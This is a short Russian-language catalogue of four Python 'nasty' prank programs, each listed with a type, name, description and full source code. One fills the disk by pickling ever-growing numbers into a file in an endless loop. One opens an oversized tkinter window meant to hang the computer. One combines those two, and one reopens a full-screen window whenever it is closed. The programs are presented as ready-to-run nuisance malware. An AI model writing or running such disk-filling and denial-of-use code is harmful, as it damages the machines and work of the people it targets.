Бяка №1

Тип:
заполнитель места

Имя:
Мега-файл

Описание:
С помощью цикла и модуля pickle
быстро создаёт гигабайты. 

Исходный код:
import pickle
save=open('a.txt','wb')
a=1
while True:
    pickle.dump(a,save)
    a=a*10

Бяка №2

Тип:
зависание

Имя:
Мега-окно

Описание:
Пытается создать огромное tkinter-окно,
из-за чего компьютер зависает.

Исходный код:
from tkinter import *
root=Tk()
root.geometry('10000x5000')

Бяка №3

Тип:
заполнитель места + зависание

Имя:
Мега-файл и мега окно

Описание:
Пытается создать огромное tkinter-окно,
и в это время создаёт мега-файл.

Исходный код:
import pickle
from tkinter import *
root=Tk()
root.geometry('10000x5000')
save=open('a.txt','wb')
a=1
while True:
    pickle.dump(a,save)
    a=a*10

Бяка №4

Тип:
Надоедалка

Имя:вечное окно

Описание:
Создает tkinter-окно размером 1920 на 1080
пикселей(как стандартный экран).
Окно можно закрыть, но откроется новое.

Исходный код:
from tkinter import *

while True:
    root = Tk()
    root.geometry('1920x1080')
    root.resizable(0, 0)
    root.mainloop()

